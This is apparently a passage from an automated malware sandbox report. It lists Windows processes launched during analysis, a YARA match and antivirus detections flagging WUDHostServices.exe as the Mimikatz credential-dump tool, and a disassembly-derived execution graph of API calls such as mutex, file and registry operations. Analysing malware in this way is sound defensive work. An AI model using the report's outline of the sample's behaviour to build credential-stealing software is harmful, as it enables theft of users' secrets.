                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:21
                                              Start time:03:17:32
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\searchprotocolhost.exe
                                              Imagebase:0x930000
                                              File size:345088 bytes
                                              MD5 hash:0C5FF66721629A124F1C9F67E18A64DB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:23
                                              Start time:03:17:44
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhost.exe
                                              Imagebase:0x220000
                                              File size:19360 bytes
                                              MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:24
                                              Start time:03:17:52
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhost.exe
                                              Imagebase:0x220000
                                              File size:19360 bytes
                                              MD5 hash:70E2034A1C3D0ECCB73F57E33D4BFFA0
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:26
                                              Start time:03:18:04
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:27
                                              Start time:03:18:07
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:28
                                              Start time:03:18:15
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0xc0000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: hacktool_windows_mimikatz_copywrite, Description: Mimikatz credential dump tool: Author copywrite, Source: C:\Windows\SysWOW64\WUDHostServices.exe, Author: @fusionrace
                                              Antivirus matches:
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 33%, Metadefender, Browse
                                              • Detection: 69%, ReversingLabs

                                              General

                                              Target ID:29
                                              Start time:03:18:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:30
                                              Start time:03:18:29
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0x3e0000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:31
                                              Start time:03:18:31
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:32
                                              Start time:03:18:33
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:33
                                              Start time:03:18:42
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:35
                                              Start time:03:18:55
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\svchost.exe
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:38
                                              Start time:03:19:05
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              General

                                              Target ID:39
                                              Start time:03:19:06
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\WUDHostServices.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\WUDHostServices.exe
                                              Imagebase:0x1270000
                                              File size:47104 bytes
                                              MD5 hash:FC7880429D850789E40808D1AB45C119
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:10.1%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:8.2%
                                                Total number of Nodes:2000
                                                Total number of Limit Nodes:35
                                                execution_graph 10187 25a427 10188 25a434 10187->10188 10199 25d3bf 10188->10199 10192 25a45a 10193 25d3bf FindHandlerForForeignException 20 API calls 10192->10193 10197 25a480 10192->10197 10194 25a474 10193->10194 10196 25d2f4 _free 20 API calls 10194->10196 10196->10197 10198 25a48c 10197->10198 10212 25d7a8 10197->10212 10205 25d3cc FindHandlerForForeignException 10199->10205 10200 25d40c 10224 25d495 10200->10224 10201 25d3f7 RtlAllocateHeap 10202 25a44e 10201->10202 10201->10205 10206 25d2f4 10202->10206 10205->10200 10205->10201 10219 25beae 10205->10219 10207 25d328 __dosmaperr 10206->10207 10208 25d2ff HeapFree 10206->10208 10207->10192 10208->10207 10209 25d314 10208->10209 10210 25d495 __dosmaperr 18 API calls 10209->10210 10211 25d31a GetLastError 10210->10211 10211->10207 10213 25d4c2 FindHandlerForForeignException 5 API calls 10212->10213 10214 25d7cf 10213->10214 10215 25d7ed InitializeCriticalSectionAndSpinCount 10214->10215 10216 25d7d8 10214->10216 10215->10216 10217 257097 TranslatorGuardHandler 5 API calls 10216->10217 10218 25d804 10217->10218 10218->10197 10227 25bef2 10219->10227 10222 25beee 10222->10205 10223 25bec4 10233 257097 10223->10233 10246 25e9ea GetLastError 10224->10246 10228 25befe ___DestructExceptionObject 10227->10228 10240 25f698 EnterCriticalSection 10228->10240 10230 25bf09 10241 25bf3b 10230->10241 10232 25bf30 ___DestructExceptionObject 10232->10223 10234 2570a0 10233->10234 10235 2570a2 IsProcessorFeaturePresent 10233->10235 10234->10222 10237 25712a 10235->10237 10245 2570ee SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10237->10245 10239 25720d 10239->10222 10240->10230 10244 25f6e0 LeaveCriticalSection 10241->10244 10243 25bf42 10243->10232 10244->10243 10245->10239 10247 25ea03 10246->10247 10248 25ea09 10246->10248 10265 25d6f9 10247->10265 10250 25d3bf FindHandlerForForeignException 17 API calls 10248->10250 10252 25ea60 SetLastError 10248->10252 10251 25ea1b 10250->10251 10253 25ea23 10251->10253 10272 25d74f 10251->10272 10254 25d49a 10252->10254 10256 25d2f4 _free 17 API calls 10253->10256 10254->10202 10258 25ea29 10256->10258 10261 25ea57 SetLastError 10258->10261 10259 25ea3f 10279 25e7d8 10259->10279 10261->10254 10263 25d2f4 _free 17 API calls 10264 25ea50 10263->10264 10264->10252 10264->10261 10284 25d4c2 10265->10284 10267 25d720 10268 25d738 TlsGetValue 10267->10268 10269 25d72c 10267->10269 10268->10269 10270 257097 TranslatorGuardHandler 5 API calls 10269->10270 10271 25d749 10270->10271 10271->10248 10273 25d4c2 FindHandlerForForeignException 5 API calls 10272->10273 10274 25d776 10273->10274 10275 25d791 TlsSetValue 10274->10275 10276 25d785 10274->10276 10275->10276 10277 257097 TranslatorGuardHandler 5 API calls 10276->10277 10278 25d7a2 10277->10278 10278->10253 10278->10259 10297 25e7b0 10279->10297 10285 25d4ee 10284->10285 10286 25d4f2 __crt_fast_encode_pointer 10284->10286 10285->10286 10288 25d512 10285->10288 10290 25d55e 10285->10290 10286->10267 10288->10286 10289 25d51e GetProcAddress 10288->10289 10289->10286 10291 25d57f LoadLibraryExW 10290->10291 10295 25d574 10290->10295 10292 25d5b4 10291->10292 10293 25d59c GetLastError 10291->10293 10292->10295 10296 25d5cb FreeLibrary 10292->10296 10293->10292 10294 25d5a7 LoadLibraryExW 10293->10294 10294->10292 10295->10285 10296->10295 10303 25e6f0 10297->10303 10299 25e7d4 10300 25e760 10299->10300 10314 25e5f4 10300->10314 10302 25e784 10302->10263 10304 25e6fc ___DestructExceptionObject 10303->10304 10309 25f698 EnterCriticalSection 10304->10309 10306 25e706 10310 25e72c 10306->10310 10308 25e724 ___DestructExceptionObject 10308->10299 10309->10306 10313 25f6e0 LeaveCriticalSection 10310->10313 10312 25e736 10312->10308 10313->10312 10315 25e600 ___DestructExceptionObject 10314->10315 10322 25f698 EnterCriticalSection 10315->10322 10317 25e60a 10323 25e91b 10317->10323 10319 25e622 10327 25e638 10319->10327 10321 25e630 ___DestructExceptionObject 10321->10302 10322->10317 10324 25e951 __cftof 10323->10324 10325 25e92a __cftof 10323->10325 10324->10319 10325->10324 10330 260ef0 10325->10330 10440 25f6e0 LeaveCriticalSection 10327->10440 10329 25e642 10329->10321 10331 260f70 10330->10331 10334 260f06 10330->10334 10332 260fbe 10331->10332 10335 25d2f4 _free 20 API calls 10331->10335 10398 261063 10332->10398 10334->10331 10336 260f39 10334->10336 10342 25d2f4 _free 20 API calls 10334->10342 10337 260f92 10335->10337 10338 260f5b 10336->10338 10344 25d2f4 _free 20 API calls 10336->10344 10339 25d2f4 _free 20 API calls 10337->10339 10341 25d2f4 _free 20 API calls 10338->10341 10343 260fa5 10339->10343 10340 260fcc 10347 26102c 10340->10347 10357 25d2f4 20 API calls _free 10340->10357 10346 260f65 10341->10346 10348 260f2e 10342->10348 10345 25d2f4 _free 20 API calls 10343->10345 10349 260f50 10344->10349 10350 260fb3 10345->10350 10351 25d2f4 _free 20 API calls 10346->10351 10352 25d2f4 _free 20 API calls 10347->10352 10358 260aaf 10348->10358 10386 260bad 10349->10386 10355 25d2f4 _free 20 API calls 10350->10355 10351->10331 10356 261032 10352->10356 10355->10332 10356->10324 10357->10340 10359 260ac0 10358->10359 10385 260ba9 10358->10385 10360 260ad1 10359->10360 10361 25d2f4 _free 20 API calls 10359->10361 10362 260ae3 10360->10362 10363 25d2f4 _free 20 API calls 10360->10363 10361->10360 10364 260af5 10362->10364 10365 25d2f4 _free 20 API calls 10362->10365 10363->10362 10366 260b07 10364->10366 10368 25d2f4 _free 20 API calls 10364->10368 10365->10364 10367 260b19 10366->10367 10369 25d2f4 _free 20 API calls 10366->10369 10370 25d2f4 _free 20 API calls 10367->10370 10371 260b2b 10367->10371 10368->10366 10369->10367 10370->10371 10372 260b3d 10371->10372 10373 25d2f4 _free 20 API calls 10371->10373 10374 260b4f 10372->10374 10376 25d2f4 _free 20 API calls 10372->10376 10373->10372 10375 260b61 10374->10375 10377 25d2f4 _free 20 API calls 10374->10377 10378 260b73 10375->10378 10379 25d2f4 _free 20 API calls 10375->10379 10376->10374 10377->10375 10380 260b85 10378->10380 10381 25d2f4 _free 20 API calls 10378->10381 10379->10378 10382 260b97 10380->10382 10383 25d2f4 _free 20 API calls 10380->10383 10381->10380 10384 25d2f4 _free 20 API calls 10382->10384 10382->10385 10383->10382 10384->10385 10385->10336 10387 260bba 10386->10387 10397 260c12 10386->10397 10388 260bca 10387->10388 10389 25d2f4 _free 20 API calls 10387->10389 10390 25d2f4 _free 20 API calls 10388->10390 10391 260bdc 10388->10391 10389->10388 10390->10391 10392 25d2f4 _free 20 API calls 10391->10392 10394 260bee 10391->10394 10392->10394 10393 260c00 10396 25d2f4 _free 20 API calls 10393->10396 10393->10397 10394->10393 10395 25d2f4 _free 20 API calls 10394->10395 10395->10393 10396->10397 10397->10338 10399 26108e 10398->10399 10400 261070 10398->10400 10399->10340 10400->10399 10404 260c52 10400->10404 10403 25d2f4 _free 20 API calls 10403->10399 10405 260c63 10404->10405 10439 260d30 10404->10439 10406 260c16 __cftof 20 API calls 10405->10406 10407 260c6b 10406->10407 10408 260c16 __cftof 20 API calls 10407->10408 10409 260c76 10408->10409 10410 260c16 __cftof 20 API calls 10409->10410 10411 260c81 10410->10411 10412 260c16 __cftof 20 API calls 10411->10412 10413 260c8c 10412->10413 10414 260c16 __cftof 20 API calls 10413->10414 10415 260c9a 10414->10415 10416 25d2f4 _free 20 API calls 10415->10416 10417 260ca5 10416->10417 10418 25d2f4 _free 20 API calls 10417->10418 10419 260cb0 10418->10419 10420 25d2f4 _free 20 API calls 10419->10420 10421 260cbb 10420->10421 10422 260c16 __cftof 20 API calls 10421->10422 10423 260cc9 10422->10423 10424 260c16 __cftof 20 API calls 10423->10424 10425 260cd7 10424->10425 10426 260c16 __cftof 20 API calls 10425->10426 10427 260ce8 10426->10427 10428 260c16 __cftof 20 API calls 10427->10428 10429 260cf6 10428->10429 10430 260c16 __cftof 20 API calls 10429->10430 10431 260d04 10430->10431 10432 25d2f4 _free 20 API calls 10431->10432 10433 260d0f 10432->10433 10434 25d2f4 _free 20 API calls 10433->10434 10435 260d1a 10434->10435 10436 25d2f4 _free 20 API calls 10435->10436 10437 260d25 10436->10437 10438 25d2f4 _free 20 API calls 10437->10438 10438->10439 10439->10403 10440->10329 10478 2573ab 10479 2573b7 ___DestructExceptionObject 10478->10479 10506 25768f 10479->10506 10481 2573be 10483 2573e7 10481->10483 10584 257993 IsProcessorFeaturePresent 10481->10584 10490 257426 ___scrt_release_startup_lock 10483->10490 10517 25c79d 10483->10517 10487 257406 ___DestructExceptionObject 10488 257486 10525 259241 10488->10525 10490->10488 10588 25ca40 10490->10588 10492 25748d 10532 25c728 10492->10532 10501 2574c5 10503 2574ce 10501->10503 10594 25ca1b 10501->10594 10597 257809 10503->10597 10507 257698 10506->10507 10603 257bde IsProcessorFeaturePresent 10507->10603 10511 2576a9 10512 2576ad 10511->10512 10617 25d0c5 10511->10617 10512->10481 10515 2576c4 10515->10481 10519 25c7b4 10517->10519 10518 257097 TranslatorGuardHandler 5 API calls 10520 257400 10518->10520 10519->10518 10520->10487 10521 25c741 10520->10521 10522 25c770 10521->10522 10523 257097 TranslatorGuardHandler 5 API calls 10522->10523 10524 25c799 10523->10524 10524->10490 10775 259207 GetModuleFileNameW 10525->10775 10527 2592cb 10528 257097 TranslatorGuardHandler 5 API calls 10527->10528 10529 2592d9 10528->10529 10529->10492 10530 259269 10530->10527 10779 253c97 10530->10779 10533 25c731 10532->10533 10534 2574a0 10532->10534 10785 25c46f 10533->10785 10536 256960 FreeConsole CreateMutexA GetLastError 10534->10536 10537 2569d8 10536->10537 10549 2569ea 10536->10549 10538 2569dc ReleaseMutex CloseHandle 10537->10538 10539 256a18 10537->10539 10538->10549 11216 2568a0 10539->11216 10542 256a1d ___scrt_fastfail 10544 256a3c GetModuleFileNameA 10542->10544 10542->10549 11228 256610 10544->11228 10547 257097 TranslatorGuardHandler 5 API calls 10548 256a14 10547->10548 10572 2592dd 10548->10572 11195 256760 10549->11195 10550 256a71 ___scrt_fastfail 10550->10549 11246 2558e0 10550->11246 10552 256a9f 10552->10549 11266 255c40 DeleteFileA DeleteFileA CreateFileA 10552->11266 10554 256abd 10554->10549 11270 256240 CreateFileA 10554->11270 10556 256adf 10556->10549 11275 255da0 10556->11275 10558 256b06 10558->10549 11283 255b10 CreateFileA 10558->11283 10560 256b23 10561 255b10 13 API calls 10560->10561 10562 256b2c 10561->10562 11295 257040 10562->11295 10566 256b60 10566->10549 11311 2559d0 RegCreateKeyExA 10566->11311 10568 256bbc 10568->10549 10569 256bc7 10568->10569 10571 2569fa 11207 2562a0 10571->11207 10573 259207 2 API calls 10572->10573 10577 259305 10573->10577 10574 259367 10575 257097 TranslatorGuardHandler 5 API calls 10574->10575 10576 2574b3 10575->10576 10579 25c94f GetModuleHandleW 10576->10579 10577->10574 10578 253c97 5 API calls 10577->10578 10578->10574 10580 2574bb 10579->10580 10580->10501 10581 25ca78 10580->10581 10582 25c7f5 _abort 28 API calls 10581->10582 10583 25ca89 10582->10583 10583->10501 10585 2579a9 ___scrt_fastfail 10584->10585 10586 257a51 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10585->10586 10587 257a9b 10586->10587 10587->10481 10589 25ca68 FindHandlerForForeignException __onexit 10588->10589 10589->10488 10590 25e966 FindHandlerForForeignException 38 API calls 10589->10590 10591 25d159 10590->10591 10592 25d37c _abort 38 API calls 10591->10592 10593 25d183 10592->10593 10595 25c7f5 _abort 28 API calls 10594->10595 10596 25ca26 10595->10596 10596->10503 10598 257815 10597->10598 10602 25782b 10598->10602 12111 25d0d7 10598->12111 10601 259658 ___scrt_uninitialize_crt 8 API calls 10601->10602 10602->10487 10604 2576a4 10603->10604 10605 25962a 10604->10605 10606 25962f ___vcrt_initialize_pure_virtual_call_handler 10605->10606 10629 25a25e 10606->10629 10609 25963d 10609->10511 10611 259645 10612 259650 10611->10612 10613 259649 10611->10613 10647 259379 10612->10647 10643 25a29a 10613->10643 10702 261297 10617->10702 10620 259658 10762 25938c 10620->10762 10623 259677 10623->10512 10624 25990b ___vcrt_uninitialize_ptd 6 API calls 10625 25966b 10624->10625 10626 25a29a ___vcrt_uninitialize_locks DeleteCriticalSection 10625->10626 10627 259670 10626->10627 10765 25a0cc 10627->10765 10630 25a267 10629->10630 10632 25a290 10630->10632 10633 259639 10630->10633 10650 25a062 10630->10650 10634 25a29a ___vcrt_uninitialize_locks DeleteCriticalSection 10632->10634 10633->10609 10635 2598d8 10633->10635 10634->10633 10668 259f77 10635->10668 10637 2598e2 10642 2598ed 10637->10642 10673 25a025 10637->10673 10639 2598fb 10640 259908 10639->10640 10678 25990b 10639->10678 10640->10611 10642->10611 10644 25a2c4 10643->10644 10645 25a2a5 10643->10645 10644->10609 10646 25a2af DeleteCriticalSection 10645->10646 10646->10644 10646->10646 10687 253ac0 10647->10687 10655 259d50 10650->10655 10652 25a07c 10653 25a099 InitializeCriticalSectionAndSpinCount 10652->10653 10654 25a085 10652->10654 10653->10654 10654->10630 10656 259d84 __crt_fast_encode_pointer 10655->10656 10658 259d80 10655->10658 10656->10652 10658->10656 10660 259da4 10658->10660 10661 259df0 10658->10661 10659 259db0 GetProcAddress 10659->10656 10660->10656 10660->10659 10662 259e18 LoadLibraryExW 10661->10662 10663 259e0d 10661->10663 10664 259e34 GetLastError 10662->10664 10665 259e4c 10662->10665 10663->10658 10664->10665 10667 259e3f LoadLibraryExW 10664->10667 10665->10663 10666 259e63 FreeLibrary 10665->10666 10666->10663 10667->10665 10669 259d50 try_get_function 5 API calls 10668->10669 10670 259f91 10669->10670 10671 259fa9 TlsAlloc 10670->10671 10672 259f9a 10670->10672 10672->10637 10674 259d50 try_get_function 5 API calls 10673->10674 10675 25a03f 10674->10675 10676 25a059 TlsSetValue 10675->10676 10677 25a04e 10675->10677 10676->10677 10677->10639 10679 259915 10678->10679 10680 25991b 10678->10680 10682 259fb1 10679->10682 10680->10642 10683 259d50 try_get_function 5 API calls 10682->10683 10684 259fcb 10683->10684 10685 259fe2 TlsFree 10684->10685 10686 259fd7 10684->10686 10685->10686 10686->10680 10688 253acf 10687->10688 10693 259e71 10688->10693 10690 253aee 10691 253af7 10690->10691 10696 253b1d 10690->10696 10691->10511 10694 259d50 try_get_function 5 API calls 10693->10694 10695 259e8b 10694->10695 10695->10690 10699 259eb1 10696->10699 10698 253b37 10698->10691 10700 259d50 try_get_function 5 API calls 10699->10700 10701 259ecb 10700->10701 10701->10698 10705 2612b4 10702->10705 10706 2612b0 10702->10706 10703 257097 TranslatorGuardHandler 5 API calls 10704 2576b6 10703->10704 10704->10515 10704->10620 10705->10706 10709 25de00 10705->10709 10721 25dd4a 10705->10721 10706->10703 10710 25de0c ___DestructExceptionObject 10709->10710 10726 25f698 EnterCriticalSection 10710->10726 10712 25de13 10727 2608d6 10712->10727 10714 25de22 10715 25de31 10714->10715 10740 25dc94 GetStartupInfoW 10714->10740 10746 25de4d 10715->10746 10719 25de42 ___DestructExceptionObject 10719->10705 10720 25dd4a 2 API calls 10720->10715 10722 25dd51 10721->10722 10723 25dd94 GetStdHandle 10722->10723 10724 25ddfc 10722->10724 10725 25dda7 GetFileType 10722->10725 10723->10722 10724->10705 10725->10722 10726->10712 10728 2608e2 ___DestructExceptionObject 10727->10728 10729 260906 10728->10729 10730 2608ef 10728->10730 10749 25f698 EnterCriticalSection 10729->10749 10731 25d495 __dosmaperr 20 API calls 10730->10731 10733 2608f4 10731->10733 10734 25ba52 __cftof 26 API calls 10733->10734 10735 2608fe ___DestructExceptionObject 10734->10735 10735->10714 10736 26093e 10757 260965 10736->10757 10738 260912 10738->10736 10750 260827 10738->10750 10741 25dcb1 10740->10741 10743 25dd43 10740->10743 10742 2608d6 27 API calls 10741->10742 10741->10743 10744 25dcda 10742->10744 10743->10720 10744->10743 10745 25dd08 GetFileType 10744->10745 10745->10744 10761 25f6e0 LeaveCriticalSection 10746->10761 10748 25de54 10748->10719 10749->10738 10751 25d3bf FindHandlerForForeignException 20 API calls 10750->10751 10752 260839 10751->10752 10754 25d7a8 11 API calls 10752->10754 10756 260846 10752->10756 10753 25d2f4 _free 20 API calls 10755 260898 10753->10755 10754->10752 10755->10738 10756->10753 10760 25f6e0 LeaveCriticalSection 10757->10760 10759 26096c 10759->10735 10760->10759 10761->10748 10769 253b48 10762->10769 10766 25a0d5 10765->10766 10768 25a0fb 10765->10768 10767 25a0e5 FreeLibrary 10766->10767 10766->10768 10767->10766 10768->10623 10772 259ef4 10769->10772 10771 253b5a 10771->10623 10771->10624 10773 259d50 try_get_function 5 API calls 10772->10773 10774 259f0e 10773->10774 10774->10771 10776 259221 10775->10776 10777 259238 10775->10777 10776->10777 10778 25922e GetLastError 10776->10778 10777->10530 10778->10777 10782 259f2e 10779->10782 10781 253d17 10781->10527 10783 259d50 try_get_function 5 API calls 10782->10783 10784 259f48 10783->10784 10784->10781 10787 25c478 10785->10787 10791 25c491 10785->10791 10786 25c480 10786->10534 10787->10786 10792 25c49e 10787->10792 10789 25c488 10789->10786 10805 25c5f7 10789->10805 10791->10534 10793 25c4a7 10792->10793 10794 25c4aa 10792->10794 10793->10789 10815 26007f 10794->10815 10799 25c4bc 10801 25d2f4 _free 20 API calls 10799->10801 10802 25c4f1 10801->10802 10802->10789 10803 25c4c7 10804 25d2f4 _free 20 API calls 10803->10804 10804->10799 10806 25c604 10805->10806 10811 25c609 10805->10811 10806->10791 10807 25c60f WideCharToMultiByte 10807->10811 10813 25c664 10807->10813 10808 25d3bf FindHandlerForForeignException 20 API calls 10808->10811 10809 25c635 WideCharToMultiByte 10810 25c66a 10809->10810 10809->10811 10812 25d2f4 _free 20 API calls 10810->10812 10811->10807 10811->10808 10811->10809 10811->10810 10811->10813 10814 25d2f4 _free 20 API calls 10811->10814 10812->10813 10813->10791 10814->10811 10816 25c4b1 10815->10816 10817 260088 10815->10817 10819 260459 GetEnvironmentStringsW 10816->10819 10848 25ff7e 10817->10848 10820 2604c3 10819->10820 10821 260470 10819->10821 10822 25c4b6 10820->10822 10823 2604cc FreeEnvironmentStringsW 10820->10823 10824 260476 WideCharToMultiByte 10821->10824 10822->10799 10831 25c4f7 10822->10831 10823->10822 10824->10820 10825 260492 10824->10825 10826 25d32e __onexit 21 API calls 10825->10826 10827 260498 10826->10827 10828 26049f WideCharToMultiByte 10827->10828 10829 2604b5 10827->10829 10828->10829 10830 25d2f4 _free 20 API calls 10829->10830 10830->10820 10832 25c50c 10831->10832 10833 25d3bf FindHandlerForForeignException 20 API calls 10832->10833 10843 25c533 10833->10843 10834 25c597 10835 25d2f4 _free 20 API calls 10834->10835 10836 25c5b1 10835->10836 10836->10803 10837 25d3bf FindHandlerForForeignException 20 API calls 10837->10843 10838 25c599 11189 25c5c8 10838->11189 10842 25c5bb 10845 25ba7f __cftof 11 API calls 10842->10845 10843->10834 10843->10837 10843->10838 10843->10842 10846 25d2f4 _free 20 API calls 10843->10846 11180 25bab2 10843->11180 10844 25d2f4 _free 20 API calls 10844->10834 10847 25c5c7 10845->10847 10846->10843 10868 25e966 GetLastError 10848->10868 10850 25ff8b 10888 26009d 10850->10888 10852 25ff93 10897 25fd12 10852->10897 10855 25ffaa 10855->10816 10857 25ffbb 10858 25ffed 10857->10858 10911 26013f 10857->10911 10861 25d2f4 _free 20 API calls 10858->10861 10861->10855 10862 25ffe8 10863 25d495 __dosmaperr 20 API calls 10862->10863 10863->10858 10864 260031 10864->10858 10921 25fbe8 10864->10921 10865 260005 10865->10864 10866 25d2f4 _free 20 API calls 10865->10866 10866->10864 10869 25e97c 10868->10869 10870 25e982 10868->10870 10871 25d6f9 FindHandlerForForeignException 11 API calls 10869->10871 10872 25d3bf FindHandlerForForeignException 20 API calls 10870->10872 10874 25e9d1 SetLastError 10870->10874 10871->10870 10873 25e994 10872->10873 10875 25e99c 10873->10875 10876 25d74f FindHandlerForForeignException 11 API calls 10873->10876 10874->10850 10877 25d2f4 _free 20 API calls 10875->10877 10878 25e9b1 10876->10878 10879 25e9a2 10877->10879 10878->10875 10880 25e9b8 10878->10880 10882 25e9dd SetLastError 10879->10882 10881 25e7d8 FindHandlerForForeignException 20 API calls 10880->10881 10883 25e9c3 10881->10883 10924 25d37c 10882->10924 10885 25d2f4 _free 20 API calls 10883->10885 10887 25e9ca 10885->10887 10887->10874 10887->10882 10889 2600a9 ___DestructExceptionObject 10888->10889 10890 25e966 FindHandlerForForeignException 38 API calls 10889->10890 10895 2600b3 10890->10895 10892 260137 ___DestructExceptionObject 10892->10852 10894 25d37c _abort 38 API calls 10894->10895 10895->10892 10895->10894 10896 25d2f4 _free 20 API calls 10895->10896 11035 25f698 EnterCriticalSection 10895->11035 11036 26012e 10895->11036 10896->10895 11040 25a9bc 10897->11040 10900 25fd45 10902 25fd5c 10900->10902 10903 25fd4a GetACP 10900->10903 10901 25fd33 GetOEMCP 10901->10902 10902->10855 10904 25d32e 10902->10904 10903->10902 10905 25d36c 10904->10905 10909 25d33c FindHandlerForForeignException 10904->10909 10907 25d495 __dosmaperr 20 API calls 10905->10907 10906 25d357 HeapAlloc 10908 25d36a 10906->10908 10906->10909 10907->10908 10908->10857 10909->10905 10909->10906 10910 25beae new 7 API calls 10909->10910 10910->10909 10912 25fd12 40 API calls 10911->10912 10913 26015e 10912->10913 10916 2601af IsValidCodePage 10913->10916 10918 260165 10913->10918 10920 2601d4 ___scrt_fastfail 10913->10920 10914 257097 TranslatorGuardHandler 5 API calls 10915 25ffe0 10914->10915 10915->10862 10915->10865 10917 2601c1 GetCPInfo 10916->10917 10916->10918 10917->10918 10917->10920 10918->10914 11076 25fdea GetCPInfo 10920->11076 11144 25fba5 10921->11144 10923 25fc0c 10923->10858 10935 261484 10924->10935 10927 25d38c 10929 25d3b4 10927->10929 10930 25d396 IsProcessorFeaturePresent 10927->10930 10965 25ca2a 10929->10965 10932 25d3a1 10930->10932 10934 25b888 _abort 8 API calls 10932->10934 10934->10929 10968 2613c1 10935->10968 10938 2614df 10939 2614eb FindHandlerForForeignException 10938->10939 10940 261512 _abort 10939->10940 10941 25e9ea __dosmaperr 20 API calls 10939->10941 10943 261518 _abort 10939->10943 10942 261564 10940->10942 10940->10943 10964 261547 10940->10964 10941->10940 10944 25d495 __dosmaperr 20 API calls 10942->10944 10950 261590 10943->10950 10977 25f698 EnterCriticalSection 10943->10977 10945 261569 10944->10945 10946 25ba52 __cftof 26 API calls 10945->10946 10946->10964 10951 2615ef 10950->10951 10953 2615e7 10950->10953 10961 26161a 10950->10961 10978 25f6e0 LeaveCriticalSection 10950->10978 10951->10961 10979 2614d6 10951->10979 10956 25ca2a _abort 28 API calls 10953->10956 10956->10951 10958 25e966 FindHandlerForForeignException 38 API calls 10962 26167d 10958->10962 10960 2614d6 _abort 38 API calls 10960->10961 